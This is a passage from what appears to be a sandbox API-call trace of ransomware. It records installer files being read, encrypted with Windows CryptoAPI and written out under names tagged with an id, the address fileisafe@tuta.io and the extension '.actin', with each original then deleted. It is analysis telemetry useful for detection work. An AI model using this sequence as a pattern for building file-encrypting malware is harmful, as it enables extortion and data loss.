pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3d60, dwBufLen=0x3d60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3d60) returned 1 [0046.792] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x3d60, lpOverlapped=0x0) returned 1 [0046.793] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c00) returned 1 [0046.793] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.793] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.793] CryptDestroyKey (hKey=0xf71c00) returned 1 [0046.793] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.793] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0046.793] CloseHandle (hObject=0x32c) returned 1 [0046.793] CloseHandle (hObject=0x300) returned 1 [0046.794] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 1 [0046.795] SetEvent (hEvent=0x2e8) returned 1 [0046.795] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.795] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.795] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=12687) returned 1 [0046.795] CloseHandle (hObject=0x300) returned 1 [0046.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 0x80 [0046.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.795] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.795] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.795] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.796] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.797] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e00) returned 1 [0046.797] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.797] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x318f, lpOverlapped=0x0) returned 1 [0046.798] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3190, dwBufLen=0x3190 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3190) returned 1 [0046.798] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x3190, lpOverlapped=0x0) returned 1 [0046.799] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e40) returned 1 [0046.799] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.799] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0046.799] CryptDestroyKey (hKey=0xf71e40) returned 1 [0046.799] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0046.799] CryptDestroyKey (hKey=0xf71e00) returned 1 [0046.799] CloseHandle (hObject=0x300) returned 1 [0046.799] CloseHandle (hObject=0x32c) returned 1 [0046.800] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 1 [0046.801] SetEvent (hEvent=0x2e8) returned 1 [0046.801] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.801] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.801] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=65238) returned 1 [0046.801] CloseHandle (hObject=0x32c) returned 1 [0046.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 0x80 [0046.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.802] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.802] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.802] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.802] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.802] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ac0) returned 1 [0046.802] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.802] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xfed6, lpOverlapped=0x0) returned 1 [0046.803] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xfee0, dwBufLen=0xfee0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xfee0) returned 1 [0046.804] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xfee0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xfee0, lpOverlapped=0x0) returned 1 [0046.805] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72100) returned 1 [0046.805] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.805] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.805] CryptDestroyKey (hKey=0xf72100) returned 1 [0046.805] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.805] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0046.805] CloseHandle (hObject=0x32c) returned 1 [0046.805] CloseHandle (hObject=0x300) returned 1 [0046.807] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 1 [0046.808] SetEvent (hEvent=0x2e8) returned 1 [0046.808] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.808] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.809] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=15192) returned 1 [0046.809] CloseHandle (hObject=0x300) returned 1 [0046.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 0x80 [0046.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.809] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.809] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.809] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.809] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.809] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71fc0) returned 1 [0047.079] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.079] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x3b58, lpOverlapped=0x0) returned 1 [0047.080] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3b60, dwBufLen=0x3b60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3b60) returned 1 [0047.080] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x3b60, lpOverlapped=0x0) returned 1 [0047.081] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e00) returned 1 [0047.081] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.081] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.081] CryptDestroyKey (hKey=0xf71e00) returned 1 [0047.081] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.081] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0047.081] CloseHandle (hObject=0x300) returned 1 [0047.081] CloseHandle (hObject=0x32c) returned 1 [0047.082] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 1 [0047.083] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.083] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.083] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=17752) returned 1 [0047.083] CloseHandle (hObject=0x32c) returned 1 [0047.083] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 0x80 [0047.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.084] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.084] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.084] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.084] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.084] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c00) returned 1 [0047.084] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.084] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4558, lpOverlapped=0x0) returned 1 [0047.085] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4560, dwBufLen=0x4560 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4560) returned 1 [0047.085] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4560, lpOverlapped=0x0) returned 1 [0047.087] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0047.087] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.087] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.087] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0047.087] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.087] CryptDestroyKey (hKey=0xf71c00) returned 1 [0047.087] CloseHandle (hObject=0x32c) returned 1 [0047.087] CloseHandle (hObject=0x300) returned 1 [0047.088] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 1 [0047.089] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.089] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.089] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=4040) returned 1 [0047.089] CloseHandle (hObject=0x300) returned 1 [0047.089] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 0x80 [0047.089] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.089] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.089] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.089] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.089] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.091] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e40) returned 1 [0047.091] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.091] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xfc8, lpOverlapped=0x0) returned 1 [0047.092] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xfd0, dwBufLen=0xfd0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xfd0) returned 1 [0047.092] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xfd0, lpOverlapped=0x0) returned 1 [0047.095] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a80) returned 1 [0047.095] CryptSetKeyParam (hKey=0xf71a80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.095] CryptEncrypt (in: hKey=0xf71a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0047.095] CryptDestroyKey (hKey=0xf71a80) returned 1 [0047.095] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0047.095] CryptDestroyKey (hKey=0xf71e40) returned 1 [0047.095] CloseHandle (hObject=0x300) returned 1 [0047.095] CloseHandle (hObject=0x32c) returned 1 [0047.096] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 1 [0047.097] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.097] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.097] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=82374) returned 1 [0047.097] CloseHandle (hObject=0x32c) returned 1 [0047.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 0x80 [0047.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.097] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.097] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.097] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.097] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.098] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0047.098] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.098] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x141c6, lpOverlapped=0x0) returned 1 